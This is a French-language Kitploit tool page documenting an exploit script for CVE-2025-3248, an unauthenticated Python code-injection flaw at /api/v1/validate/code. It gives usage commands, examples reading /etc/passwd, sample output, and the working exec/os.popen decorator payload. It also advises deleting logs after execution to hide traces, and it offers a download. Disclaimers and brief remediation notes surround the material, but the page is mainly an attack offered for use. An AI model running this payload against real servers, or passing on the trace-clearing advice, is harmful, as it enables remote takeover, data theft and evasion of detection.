Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-3248 — Exploit pour CVE-2025-3248 : injecte des charges utiles Python conçues dans un point de terminaison d'API de code non authentifié afin d'exécuter des commandes arbitraires sur le serveur cible. | Kitploit
Outils/GitHubGitHub/12-test-12/cve-2025-3248
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHub12-test-12/cve-2025-3248

CVE-2025-3248

Exploit pour CVE-2025-3248 : injecte des charges utiles Python conçues dans un point de terminaison d'API de code non authentifié afin d'exécuter des commandes arbitraires sur le serveur cible.

Voir le dépôt
2il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-3248 - Documentation de l'outil d'exploitation

Introduction

Cet outil est utilisé pour exploiter la vulnérabilité CVE-2025-3248 (injection de code Python), en construisant une charge utile malveillante pour exécuter des commandes à distance (RCE) sur le serveur cible. La vulnérabilité existe dans un point d'API Web, permettant à l'attaquant d'injecter du code Python arbitraire via un point d'exécution non vérifié.

Avertissement important :
Cet outil est destiné uniquement aux tests de sécurité autorisés. Les tests d'intrusion non autorisés peuvent enfreindre les lois. Assurez-vous de disposer d'une autorisation explicite pour le système cible.

Fonctionnalités

  • ✅ Injecte du code Python malveillant via l'interface /api/v1/validate/code
  • ✅ Prend en charge l'exécution de toute commande système (ex : whoami, ls)
  • ✅ Délai d'attente personnalisable (10 secondes par défaut)
  • ✅ Prise en charge de deux formats de sortie : texte / JSON
  • ✅ Gestion détaillée des erreurs et journalisation

Utilisation

Syntaxe de base

root@kitploit:~
python cve-2025-3248.py -t <cible_URL> -c "<commande>" [options]

Paramètres

ParamètreObligatoireDescription
-t, --targetOuiURL cible (format : http://ip:port)
-c, --commandOuiCommande système à exécuter (doit être entre guillemets)
-o, --outputNonFormat de sortie (text/json, text par défaut)
--timeoutNonDélai d'attente de la requête (secondes, 10 par défaut)
-v, --verboseNonAfficher les journaux d'exécution détaillés

Exemples d'utilisation

Exemple 1 : Exécuter la commande whoami (format de sortie par défaut)

root@kitploit:~
python cve-2025-3248.py -t http://192.168.1.100:7860 -c "whoami"

Exemple de sortie :

root@kitploit:~
[+] 命令执行成功
--------------------------------------------------
www-data
--------------------------------------------------

Exemple 2 : Format JSON + journalisation détaillée

root@kitploit:~
python cve-2025-3248.py -t https://app.example.com -c "cat /etc/passwd" -o json -v

Exemple de sortie :

root@kitploit:~
{
  "status": 200,
  "content": "root:x:0:0:root:/root:/bin/bash\n...",
  "success": true
}

Explication simplifiée du principe de la vulnérabilité

  1. Le service cible reçoit le paramètre code via l'interface /api/v1/validate/code
  2. Le serveur n'applique aucun filtrage de sécurité sur l'entrée et utilise directement exec() pour exécuter le code Python soumis
  3. L'attaquant construit une charge utile spéciale :
root@kitploit:~
import os
@exec("raise Exception(os.popen('whoami').read())")
def f():
    pass
  1. Le mécanisme de gestion des exceptions déclenche os.popen() pour exécuter la commande système

Risque de la vulnérabilité : Elle permet un contrôle total du serveur, l'exécution de commandes système arbitraires, le vol de données sensibles, l'installation de portes dérobées, etc.

Avertissement de sécurité

⚠️ Cet outil est réservé aux tests d'intrusion autorisés ⚠️

  • Risques juridiques : L'utilisation non autorisée de cet outil pour des tests d'intrusion peut violer des lois telles que le Computer Fraud and Abuse Act.
  • Risques système : L'exécution de commandes système peut entraîner un crash du service, une perte de données ou une indisponibilité.
  • Risques de détection : Les actions d'attaque peuvent être détectées et journalisées par les pare-feux, IDS/IPS.

Recommandations :

  • Utiliser uniquement dans un environnement contrôlé (laboratoire, environnement de test autorisé)
  • Privilégier l'option -v pour afficher les journaux détaillés et éviter les erreurs
  • Nettoyer immédiatement les traces après exécution (suppression des logs, fermeture de session)

Dépendances

  • Python 3.7+
  • Bibliothèque requests (doit être installée au préalable)
root@kitploit:~
pip install requests

Explication des erreurs

Code d'erreurCauseSolution
[-] URL cible invalideL'URL ne comporte pas de schéma ou d'hôteVérifier le format de l'URL (ex : http://127.0.0.1:8080)
[-] Délai d'attente dépasséLa cible ne répond pas à tempsAugmenter la valeur de --timeout
[-] Erreur de connexionCible inaccessible / pare-feu bloquantVérifier la connectivité réseau
[-] Échec de l'exécution de la commande - Code HTTP 403Refus d'autorisation du serveurConfirmer que le service cible autorise l'exécution de code

Détails techniques

  • Emplacement de la vulnérabilité : interface POST /api/v1/validate/code
  • Type de vulnérabilité : Injection de code (Code Injection)
  • Versions concernées : Non spécifiées (le script suppose que la version contient cette vulnérabilité)
  • Recommandations de correction :
    • Filtrer strictement les entrées (interdire les fonctions exec, eval, etc.)
    • Exécuter le code utilisateur dans un environnement isolé (sandbox)
    • Limiter les permissions des points d'API

Clause de non-responsabilité

Ce document est destiné uniquement à des fins de recherche en sécurité et d'éducation. L'auteur décline toute responsabilité directe ou indirecte liée à l'utilisation de cet outil. Veuillez respecter les lois et utiliser les outils de sécurité de manière légale.

Télécharger l’outil